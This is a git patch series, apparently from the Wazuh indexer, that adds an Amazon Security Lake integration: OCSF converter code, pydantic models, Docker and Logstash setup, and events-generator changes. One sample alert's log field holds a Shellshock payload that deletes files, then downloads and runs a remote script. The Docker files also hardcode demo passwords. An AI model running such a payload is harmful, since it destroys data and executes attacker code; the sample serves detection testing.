0000000000000..983ba9572841f --- /dev/null +++ b/integrations/amazon-security-lake/transform/converter.py @@ -0,0 +1,112 @@ +import json + +import pydantic +import transform.models as models + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding: + finding_info = models.ocsf.FindingInfo( + analytic=models.ocsf.AnalyticInfo( + category=", ".join(event.rule.groups), + name=event.decoder.name, + type_id=1, + uid=event.rule.id + ), + attacks=models.ocsf.AttackInfo( + tactic=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.tactic), + uid=", ".join(event.rule.mitre.id) + ), + technique=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.technique), + uid=", ".join(event.rule.mitre.id) + ), + version="v13.1" + ), + title=event.rule.description, + types=[event.input.type], + uid=event.id + ) + + metadata = models.ocsf.Metadata( + log_name="Security events", + log_provider="Wazuh", + product=models.ocsf.ProductInfo( + name="Wazuh", + lang="en", + vendor_name="Wazuh, Inc,." + ), + version="1.1.0" + ) + + resources = [models.ocsf.Resource( + name=event.agent.name, uid=event.agent.id)] + + severity_id = normalize(event.rule.level) + + unmapped = { + "data_sources": [ + event.location, + event.manager.name + ], + "nist": event.rule.nist_800_53 # Array + } + + return models.ocsf.DetectionFinding( + count=event.rule.firedtimes, + message=event.rule.description, + finding_info=finding_info, + metadata=metadata, + raw_data=event.full_log, + resources=resources, + risk_score=event.rule.level, + severity_id=severity_id, + time=event.timestamp, + unmapped=unmapped + ) + + +def from_json(event: dict) -> models.wazuh.Event: + # Needs to a string, bytes or bytearray + try: + return models.wazuh.Event.model_validate_json(json.dumps(event)) + except pydantic.ValidationError as e: + print(e) + + +def _test(): + ocsf_event = {} + with open("wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + event = json.load(fd) + try: + # Create instance of Event from JSON input (must be string, bytes or bytearray) + event = models.wazuh.Event.model_validate_json(json.dumps(event)) + print(event) + ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + except pydantic.ValidationError as e: + print(e) + + if ocsf_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(ocsf_event.model_dump(), fd) + print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py new file mode 100644 index 0000000000000..2a14b75957c97 --- /dev/null +++ b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py @@ -0,0 +1,87 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], + "type_id": 1, + "uid": event["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["rule"]["description"], + "types": [ + event["input"]["type"] + ], + "uid": event['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["full_log"], + "resources": [ + { + "name": event["agent"]["name"], + "uid": event["agent"]["id"] + }, + ], + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), + "status_id": 99, + "time": event["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["location"], + event["manager"]["name"] + ], + "nist": event["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py similarity index 57% rename from integrations/amazon-security-lake/ocsf/test.py rename to integrations/amazon-security-lake/transform/legacy/legacy_test.py index e7d947848b067..ebcb8fa4b2e90 100644 --- a/integrations/amazon-security-lake/ocsf/test.py +++ b/integrations/amazon-security-lake/transform/legacy/legacy_test.py @@ -1,15 +1,15 @@ #!/usr/bin/python -from converter import convert +from transform.legacy.converter import convert import json converted_event = {} -with open("wazuh-event.sample.json", "r") as fd: +with open("../wazuh-event.sample.json", "r") as fd: sample_event = json.load(fd) # print(json.dumps(sample_event, indent=4)) converted_event = convert(sample_event) - + if converted_event: - with open("wazuh-event.ocsf.json", "w") as fd: + with open("../wazuh-event.ocsf.json", "w") as fd: json.dump(converted_event, fd) - print("Done") \ No newline at end of file + print("Done") diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py new file mode 100644 index 0000000000000..2fdec7bc648af --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/__init__.py @@ -0,0 +1,2 @@ +import transform.models.wazuh +import transform.models.ocsf diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py new file mode 100644 index 0000000000000..4918b6e29081c --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/ocsf.py @@ -0,0 +1,66 @@ +import pydantic +import typing + + +class AnalyticInfo(pydantic.BaseModel): + category: str + name: str + type_id: int + uid: str + + +class TechniqueInfo(pydantic.BaseModel): + name: str + uid: str + + +class AttackInfo(pydantic.BaseModel): + tactic: TechniqueInfo + technique: TechniqueInfo + version: str + + +class FindingInfo(pydantic.BaseModel): + analytic: AnalyticInfo + attacks: AttackInfo + title: str + types: typing.List[str] + uid: str + + +class ProductInfo(pydantic.BaseModel): + name: str + lang: str + vendor_name: str + + +class Metadata(pydantic.BaseModel): + log_name: str + log_provider: str + product: ProductInfo + version: str + + +class Resource(pydantic.BaseModel): + name: str + uid: str + + +class DetectionFinding(pydantic.BaseModel): + activity_id: int = 1 + category_name: str = "Findings" + category_uid: int = 2 + class_name: str = "Detection Finding" + class_uid: int = 2004 + count: int + message: str + finding_info: FindingInfo + metadata: Metadata + raw_data: str + resources: typing.List[Resource] + risk_score: int + severity_id: int + status_id: int = 99 + time: str + type_uid: int = 200401 + unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field() diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py new file mode 100644 index 0000000000000..34aa3c91e96e1 --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/wazuh.py @@ -0,0 +1,50 @@ +import pydantic +import typing + +# =========== Wazuh event models =========== # +# These are only the fields required for the integration. + + +class Mitre(pydantic.BaseModel): + technique: typing.List[str] = [] + id: typing.List[str] = "" + tactic: typing.List[str] = [] + + +class Rule(pydantic.BaseModel): + firedtimes: int = 0 + description: str = "" + groups: typing.List[str] = [] + id: str = "" + mitre: Mitre = Mitre() + level: int = 0 + nist_800_53: typing.List[str] = [] + + +class Decoder(pydantic.BaseModel): + name: str + + +class Input(pydantic.BaseModel): + type: str + + +class Agent(pydantic.BaseModel): + name: str + id: str + + +class Manager(pydantic.BaseModel): + name: str + + +class Event(pydantic.BaseModel): + rule: Rule = {} + decoder: Decoder = {} + input: Input = {} + id: str = "" + full_log: str = "" + agent: Agent = {} + timestamp: str = "" + location: str = "" + manager: Manager = {} diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json new file mode 100644 index 0000000000000..d7e0558b62c62 --- /dev/null +++ b/integrations/amazon-security-lake/wazuh-event.sample.json @@ -0,0 +1,76 @@ +{ + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" +} \ No newline at end of file From 05ae2d15a92777e885cc3890ebf94ac2bab65b1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:49:49 +0100 Subject: [PATCH 25/34] Create minimal Docker environment to test and develop the integration. --- integrations/.gitignore | 5 + integrations/README.md | 32 ++++ .../amazon-security-lake/.dockerignore | 180 ++++++++++++++++++ integrations/amazon-security-lake/Dockerfile | 41 ++++ integrations/amazon-security-lake/README.md | 15 +- .../logstash/pipeline/indexer-to-file.conf | 26 +++ ...output.conf => indexer-to-integrator.conf} | 0 .../{wazuh-s3.conf => indexer-to-s3.conf} | 0 .../amazon-security-lake/logstash/setup.sh | 11 +- integrations/amazon-security-lake/run.py | 2 + .../stdin_to_securitylake.py | 2 +- .../amazon-security-lake.yml} | 29 ++- .../tools/events-generator/.dockerignore | 2 + .../tools/events-generator/Dockerfile | 4 + integrations/tools/events-generator/README.md | 11 ++ integrations/tools/events-generator/run.py | 13 +- 16 files changed, 349 insertions(+), 24 deletions(-) create mode 100644 integrations/.gitignore create mode 100644 integrations/README.md create mode 100644 integrations/amazon-security-lake/.dockerignore create mode 100644 integrations/amazon-security-lake/Dockerfile create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf rename integrations/amazon-security-lake/logstash/pipeline/{pipe-output.conf => indexer-to-integrator.conf} (100%) rename integrations/amazon-security-lake/logstash/pipeline/{wazuh-s3.conf => indexer-to-s3.conf} (100%) rename integrations/{amazon-security-lake/docker-compose.yml => docker/amazon-security-lake.yml} (69%) create mode 100644 integrations/tools/events-generator/.dockerignore create mode 100644 integrations/tools/events-generator/Dockerfile diff --git a/integrations/.gitignore b/integrations/.gitignore new file mode 100644 index 0000000000000..8f10b6459740c --- /dev/null +++ b/integrations/.gitignore @@ -0,0 +1,5 @@ +elastic +opensearch +splunk +common +config \ No newline at end of file diff --git a/integrations/README.md b/integrations/README.md new file mode 100644 index 0000000000000..5e69b4f673d6c --- /dev/null +++ b/integrations/README.md @@ -0,0 +1,32 @@ +## Wazuh indexer integrations + +This folder contains integrations with third-party XDR, SIEM and cybersecurity software. +The goal is to transport Wazuh's analysis to the platform that suits your needs. + +### Amazon Security Lake + +TBD + +##### Usage + +A demo of the integration can be started using the content of this folder and Docker. + +```console +docker compose -f ./docker/amazon-security-lake.yml up -d +``` + +This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node, +a *logstash* node and our event generator. On the one hand, the event generator will push events +constantly to the indexer. On the other hand, logstash will constantly query for new data and +deliver it to the integration Python program, also present in that node. Finally, the integration +module will prepare and send the data to the Amazon Security Lake's S3 bucket. + + +For production usage, follow the instructions in our documentation page about this matter. +(_when-its-done_) + +As a last note, we would like to point out that we also use this Docker environment for development. + +### Other integrations + +TBD diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore new file mode 100644 index 0000000000000..891ff7a135014 --- /dev/null +++ b/integrations/amazon-security-lake/.dockerignore @@ -0,0 +1,180 @@ +wazuh-event.ocsf.json +*.parquet +Dockerfile + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile new file mode 100644 index 0000000000000..a2eec0f8d6075 --- /dev/null +++ b/integrations/amazon-security-lake/Dockerfile @@ -0,0 +1,41 @@ +# MULTI-STAGE build + +FROM python:3.9 as builder +# Create a virtualenv for dependencies. This isolates these packages from +# system-level packages. +RUN python3 -m venv /env +# Setting these environment variables are the same as running +# source /env/bin/activate. +ENV VIRTUAL_ENV /env +ENV PATH /env/bin:$PATH +# Copy the application's requirements.txt and run pip to install all +# dependencies into the virtualenv. +COPY requirements.txt /app/requirements.txt +RUN pip install -r /app/requirements.txt + + +FROM python:3.9 +ENV LOGSTASH_KEYSTORE_PASS="SecretPassword" +# Add the application source code. +COPY --chown=logstash:logstash . /home/app +# Add execution persmissions. +RUN chmod a+x /home/app/run.py +# Copy the application's dependencies. +COPY --from=builder /env /env + +# Install Logstash +RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https +RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt-get update && apt install -y logstash +# Install logstash-input-opensearch plugin. +RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch +# Copy the Logstash's ingestion pipelines. +COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline +# Grant logstash ownership over its files +RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash + +USER logstash +# Copy and run the setup.sh script to create and configure a keystore for Logstash. +COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh +RUN bash /usr/share/logstash/bin/setup.sh \ No newline at end of file diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md index 46eee1b92a4b0..1dbe1dd4ebb23 100644 --- a/integrations/amazon-security-lake/README.md +++ b/integrations/amazon-security-lake/README.md @@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf - # Start Logstash sudo systemctl enable logstash sudo systemctl start logstash -``` \ No newline at end of file +``` + + +### Building the Docker image + +```console +docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain +``` + + +Run with: +```console +docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls +``` diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf new file mode 100644 index 0000000000000..e3fa60a785372 --- /dev/null +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -0,0 +1,26 @@ +input { + opensearch { + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + file { + path => "/usr/share/logstash/pipeline/indexer-to-file.json" + } +} diff --git a/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf diff --git a/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh index 2b1fc109f401a..9527f1fa58362 100644 --- a/integrations/amazon-security-lake/logstash/setup.sh +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -4,12 +4,7 @@ # indexer's credentials. NOTE: works only for dockerized logstash. # Source: https://www.elastic.co/guide/en/logstash/current/keystore.html -# Prepare keystore -set +o history -export LOGSTASH_KEYSTORE_PASS="SecretPassword" -set -o history - # Create keystore -/usr/share/logstash/bin/logstash-keystore create -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD +/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index d8234226bf98e..515d1d97610f9 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -1,3 +1,5 @@ +#!/env/bin/python3.9 + import transform import json diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ab399f58b7b9a..4aa650b158c54 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 +#!/env/bin/python3.9 import os import sys diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/docker/amazon-security-lake.yml similarity index 69% rename from integrations/amazon-security-lake/docker-compose.yml rename to integrations/docker/amazon-security-lake.yml index 6c5c1c21445c9..67effe4deed55 100644 --- a/integrations/amazon-security-lake/docker-compose.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,5 +1,18 @@ version: '3' +name: "amazon-security-lake" services: + events-generator: + image: wazuh/indexer-events-generator + build: + context: ../tools/events-generator + container_name: events-generator + depends_on: + - opensearch-node + networks: + - opensearch-net + # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + opensearch-node: image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues container_name: opensearch-node @@ -21,6 +34,7 @@ services: - opensearch-data:/usr/share/opensearch/data networks: - opensearch-net + opensearch-dashboards: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes container_name: opensearch-dashboards @@ -33,16 +47,9 @@ services: networks: - opensearch-net logstash: + image: wazuh/indexer-security-lake-integration build: - context: . - dockerfile_inline: | - FROM logstash:8.12.1 - - COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh - COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config - - RUN bash /usr/share/logstash/bin/setup.sh - RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + context: ../amazon-security-lake container_name: logstash environment: LOG_LEVEL: trace @@ -53,12 +60,14 @@ services: - "5000:5000/udp" - "5044:5044" - "9600:9600" + volumes: + - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - opensearch-node networks: - opensearch-net command: tail -f /dev/null - # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash volumes: opensearch-data: diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore new file mode 100644 index 0000000000000..0f028b576338e --- /dev/null +++ b/integrations/tools/events-generator/.dockerignore @@ -0,0 +1,2 @@ +.venv +Dockerfile \ No newline at end of file diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile new file mode 100644 index 0000000000000..da32f8c042017 --- /dev/null +++ b/integrations/tools/events-generator/Dockerfile @@ -0,0 +1,4 @@ +FROM python:3.9 +COPY . /home/events-generator/ +WORKDIR /home/events-generator +RUN pip install -r requirements.txt \ No newline at end of file diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md index b11988192929e..ed8e53ea8acd9 100644 --- a/integrations/tools/events-generator/README.md +++ b/integrations/tools/events-generator/README.md @@ -41,3 +41,14 @@ INFO:event_generator:Event created INFO:event_generator:Event created {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1} ``` + +### Building the Docker image + +```console +docker build -t wazuh/indexer-events-generator:latest . +``` + +Run with: +```console +docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h +``` \ No newline at end of file diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 3a6a4aeba9fc0..9b56f6969c505 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -1,4 +1,4 @@ -#!/usr/bin/pyton +#!/usr/bin/python3 # Events generator tool for Wazuh's indices. # Chooses a random element from /alerts.json to index @@ -136,6 +136,11 @@ def parse_args(): parser = argparse.ArgumentParser( description="Events generator tool for Wazuh's indices. Indexes a random element from /alerts.json", ) + parser.add_argument( + '-i', '--index', + default="wazuh-alerts-4.x-sample", + help="Destination index name or alias" + ) parser.add_argument( '-o', '--output', choices=['indexer', 'filebeat'], @@ -143,9 +148,9 @@ def parse_args(): help="Destination of the events. Default: indexer." ) parser.add_argument( - '-i', '--index', + '-m', '--module', default="wazuh-alerts", - help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)" + help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name." ) # Infinite loop by default parser.add_argument( @@ -189,7 +194,7 @@ def parse_args(): def main(args: dict): - inventory = Inventory(f"{args['index']}/alerts.json") + inventory = Inventory(f"{args['module']}/alerts.json") logger.info("Inventory created") publisher = PublisherCreator.create(args["output"], args) logger.info("Publisher created") From 17f47caec1e9db250585e01878ae4a0a62657f43 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:58:02 +0100 Subject: [PATCH 26/34] Fix events-generator's Inventory starvation --- integrations/tools/events-generator/run.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 9b56f6969c505..ec4ded0010c76 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -42,9 +42,11 @@ def __init__(self, path: str): self.size = len(self.elements) def get_random(self) -> str: + """ + Returns the last element of the list + """ random.shuffle(self.elements) - return self.elements.pop() - # return self.elements[random.randint(0, self.size)] + return self.elements[self.size-1] # ================================================== # From 204948fdad9f77095e625a8278e06c212b26f2f0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:08:30 +0100 Subject: [PATCH 27/34] Remove files present in #147 --- .../stdin_to_securitylake.py | 91 -------------- .../transform/legacy/legacy_converter.py | 87 ------------- .../transform/legacy/legacy_test.py | 15 --- integrations/docker/docker-compose.yml | 117 ------------------ 4 files changed, 310 deletions(-) delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_test.py delete mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py deleted file mode 100755 index 4aa650b158c54..0000000000000 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ /dev/null @@ -1,91 +0,0 @@ -#!/env/bin/python3.9 - -import os -import sys -import argparse -import logging -import time -import json -import datetime -from pyarrow import parquet, Table, fs - -from transform import converter - -block_ending = { "block_ending": True } - -def encode_parquet(list,foldername,filename): - try: - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) - except Exception as e: - logging.error(e) - raise - -def map_block(fileobject, length): - output=[] - ocsf_mapped_alert = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(block_ending) - break - alert = json.loads(line) - ocsf_mapped_alert = converter.convert(alert) - output.append(ocsf_mapped_alert) - return output - -def get_elapsedseconds(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - - try: - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - starttimestamp = 